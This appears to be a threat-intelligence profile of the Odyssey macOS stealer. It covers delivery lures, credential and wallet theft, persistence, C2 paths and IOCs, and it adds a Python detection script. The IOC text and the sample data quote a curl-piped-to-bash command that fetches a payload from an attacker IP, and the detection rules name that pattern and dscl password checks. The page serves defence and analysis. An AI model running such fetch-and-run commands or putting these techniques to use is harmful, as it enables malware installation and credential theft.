Odyssey Stealer
Odyssey Stealer is a macOS-focused information stealer and remote access trojan operated as a Malware-as-a-Service (MaaS) platform with an affiliate model. Sources consistently describe it as a rebrand and evolution of Poseidon Stealer, itself forked from Atomic macOS Stealer (AMOS), and it shares substantial AppleScript-based tradecraft with both. It targets Apple macOS systems worldwide and has been observed stealing browser credentials, cookies and autofill data, Keychain contents, Apple Notes, Telegram Desktop data, files from the Desktop and Documents folders, and cryptocurrency wallet data. Reported wallet targeting covers more than 100 browser wallet extensions and numerous desktop wallets, including MetaMask, Phantom, Electrum, Exodus, Atomic, Ledger Live, Trezor Suite, Bitcoin Core, Monero, Wasabi, and Sparrow. Stolen data is typically compressed into ZIP archives and exfiltrated to attacker-controlled infrastructure.
The malware is usually delivered through social-engineering-driven macOS infection chains, especially paste-and-run (ClickFix-style) lures that instruct victims to paste malicious commands into Terminal. Delivery themes reported in the sources include fake Homebrew sites, fake software updates, cracked tools, fraudulent apps, fake ChatGPT desktop app pages, and other spoofed developer-tool or software portals. Earlier campaigns delivered the malware as an app inside a DMG and relied on the right-click-to-open Gatekeeper bypass; after Apple patched that widely abused bypass in late 2024, delivery shifted toward script-based chains.
Operationally, Odyssey relies heavily on AppleScript and shell scripts. Reported behaviors include displaying a fake macOS password prompt, validating the entered password with dscl . authonly, and then using the stolen password to access Keychain data, install persistence, and replace legitimate wallet applications: Ledger and Trezor applications have been described as being swapped for trojanized versions that intercept credentials and transactions. Persistence is established through launchd using LaunchDaemon plist files with randomized names, and the RAT component polls command-and-control (C2) infrastructure every 60 seconds for tasking. Reported RAT capabilities include arbitrary shell execution, reinfection (repeat execution), SOCKS5 proxy enablement, and an uninstall function. Odyssey is also reported to have introduced anti-sandboxing and anti-analysis checks and botnet-style remote execution features.
The malware belongs to a centralized criminal ecosystem. Sources attribute the Poseidon/Odyssey lineage to a developer known as Rodrigo4 on the Russian-language XSS forum, and cite Russian-language forum activity, Russian dashboard translations, and the build ID string "xxxblyat" as indicators of Russian-speaking operators or developers. A September 2023 advertisement described centrally hosted infrastructure priced at $3,000 per month for up to 15 affiliates, with affiliates using developer-hosted panels and C2. Researchers identified Odyssey infrastructure through its React-based admin panel and tracked 10 physical C2/MaaS hosts. Reported infrastructure and indicators include IPs 62.60.131[.]230, 62.60.131[.]250, 5.199.166[.]102, 77.90.185[.]24, 185.11.61[.]84, 217.119.139[.]117, 185.93.89[.]62, 185.93.89[.]63, 45.146.130[.]129, and 213.209.159[.]175; domains something0x[.]at, charge0x[.]at, and sdojifsfiudgigfiv[.]to; panel favicon MD5 9108dde25ad958b27f6a97d644775dee; and a shared SOCKS proxy binary SHA256 d254125912d9e9e5c271766bc4f6eea0c296ad2c0cf19d4bd57081d1bf10f044.
Additional high-confidence indicators and distinguishing traits include Odyssey's use of the HTTP header name buildid in exactly that casing together with a username header, differences from Atomic in file names, URLs, and curl options, payload distribution URLs of the form /d/{affiliate}{campaign_id}, RAT polling of /api/v1/bot/actions/{botid}, and exfiltration to /log. One reported IOC from a fake Homebrew campaign was the command curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash &. Geographic targeting is broad: activity was first reported in the United States, France, and Spain and later across North America, Latin America, Europe, Asia, and Africa.
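As an added defensive example that is not part of the original reporting, the following Python flags the network and host patterns summarised above (the /d/, /api/v1/bot/actions/ and /log paths, the buildid/username header pair, curl-piped-to-shell paste-and-run chains, and dscl . authonly) in constructed sample telemetry. The event layout, field names, rule names, and every sample value except the quoted fake Homebrew IOC and the "xxxblyat" build ID are assumptions.

```python
import re

# Network patterns taken from the reporting summarised above: payload staging
# under /d/{affiliate}{campaign_id}, RAT polling of /api/v1/bot/actions/{botid},
# exfiltration to /log, and the "buildid"/"username" header pair.
HTTP_RULES = [
    ("odyssey_payload_fetch", "GET", re.compile(r"^/d/[A-Za-z0-9]{4,}$")),
    ("odyssey_rat_poll", "GET", re.compile(r"^/api/v1/bot/actions/[A-Za-z0-9-]+$")),
    ("odyssey_exfil_post", "POST", re.compile(r"^/log$")),
]
# Host patterns: paste-and-run chains that pipe curl into a shell, and the fake
# password prompt validating its input with "dscl . authonly".
CMD_RULES = [
    ("paste_and_run_curl_pipe_sh", re.compile(r"curl\s+-s\s+\S+\s*\|\s*(nohup\s+)?(ba)?sh\b")),
    ("dscl_authonly_check", re.compile(r"\bdscl\s+\.\s+authonly\b")),
]

def match_http(event: dict) -> list[str]:
    """Rule names hit by one HTTP event shaped as {"method", "path", "headers"}."""
    hits = [n for n, m, p in HTTP_RULES if event["method"] == m and p.match(event["path"])]
    # Header names are compared case-sensitively on purpose: the exact casing
    # is itself one of the distinguishing traits reported for this family.
    if {"buildid", "username"} <= set(event.get("headers", {})):
        hits.append("odyssey_header_casing")
    return hits

def match_cmd(cmdline: str) -> list[str]:
    """Rule names hit by one process command line."""
    return [n for n, p in CMD_RULES if p.search(cmdline)]

def scan(http_events, cmdlines) -> list[tuple[str, str]]:
    """Flatten every finding into (evidence, rule) pairs for triage."""
    findings = [(e["path"], r) for e in http_events for r in match_http(e)]
    return findings + [(c, r) for c in cmdlines for r in match_cmd(c)]

# Constructed sample telemetry (not captured traffic); the staging URL reuses
# the fake Homebrew IOC quoted above and the build ID the reported "xxxblyat".
SAMPLE_HTTP = [
    {"method": "GET", "path": "/d/vipx69930", "headers": {"User-Agent": "curl/8.4.0"}},
    {"method": "GET", "path": "/api/v1/bot/actions/3f9c1a2b",
     "headers": {"buildid": "xxxblyat", "username": "jdoe"}},
    {"method": "POST", "path": "/log", "headers": {"buildid": "xxxblyat", "username": "jdoe"}},
    {"method": "GET", "path": "/index.html", "headers": {}},
]
SAMPLE_CMDS = [
    "curl -s http://185.93.89.62/d/vipx69930 | nohup bash &",
    "dscl . authonly jdoe REDACTED",
    "brew install wget",
]
```

Calling scan(SAMPLE_HTTP, SAMPLE_CMDS) yields seven findings across the four HTTP events and three command lines; only the benign /index.html request and brew command go unflagged.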
Groups observed using it
1 distinct threat actor attributed by public researchers.
Odyssey, in essence, is a sophisticated variation or updated iteration of the original Poseidon, designed to operate in the post-Gatekeeper bypass era.
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (3 techniques)
"Odyssey Stealer ... has been deployed via seemingly legitimate software updates, cracked tools, and fraudulent apps"
Execution (6 techniques)
Some adversaries have used lures designed specifically for macOS users that encourage the user to open Spotlight, then macOS Terminal to execute malicious commands.
In most scenarios, once users interact with the Fix or Verify button in the lure, the button will covertly copy an obfuscated PowerShell command to the clipboard and present the user with "verification steps."
Once the fateful paste into a Terminal window took place, the traditional AppleScript stealer code we've observed in previous years executed to gather data and exfiltrate.
The main payload is obfuscated AppleScript wrapped in a shell script ... do shell script command_payload
Persistence (1 technique)
Privilege Escalation (1 technique)
Stealth (4 techniques)
"Aside from continuously modifying its code structure to evade standard blocklists"
adversaries created fake websites that mimic trusted macOS dev tools like Homebrew to spread Odyssey and Atomic Stealer.
All five clusters rely on a living-off-the-land (LotL) approach, using trusted system tools already present on the operating system to carry out the attack. By routing execution through native utilities like PowerShell or the macOS Terminal, attackers effectively operate outside the reach of most standard browser-based security defenses.
Odyssey Stealer brought with it a host of enhanced capabilities designed specifically to evade detection... These new features included: Anti-sandboxing mechanisms: Tools and logic to detect and avoid execution within analysis environments like virtual machines or emulators.
Credential Access (6 techniques)
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
On macOS, this exact trap drops Odyssey Stealer to steal sensitive data.
Browser Data (Chromium-based): Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, CocCoc Cookies ... Browser Data (Gecko-based): Firefox, Waterfox cookies.sqlite
Discovery (1 technique)
Odyssey Stealer brought with it a host of enhanced capabilities designed specifically to evade detection... These new features included: Anti-sandboxing mechanisms: Tools and logic to detect and avoid execution within analysis environments like virtual machines or emulators.
Collection (3 techniques)
A fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
Command and Control (4 techniques)
Botnet component: Adding functionality for persistent remote execution and control, indicating a move towards more complex capabilities beyond simple, one-time data exfiltration.
supporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines ... enablesocks5 Downloads and runs SOCKS5 proxy
Exfiltration (1 technique)
IOCs tracked for this family
73 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
24 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An infostealer delivered via fake ChatGPT desktop app download pages in the LLMShare campaign; it targets macOS users and steals sensitive data.
Information-stealing malware observed being downloaded by the spoofed Homebrew infrastructure as part of the campaign.
Information-stealing malware deployed via ClickFix campaigns, associated with credential theft and cryptocurrency wallet data harvesting.
A malware family referenced as a secondary payload delivered through ClickFix activity.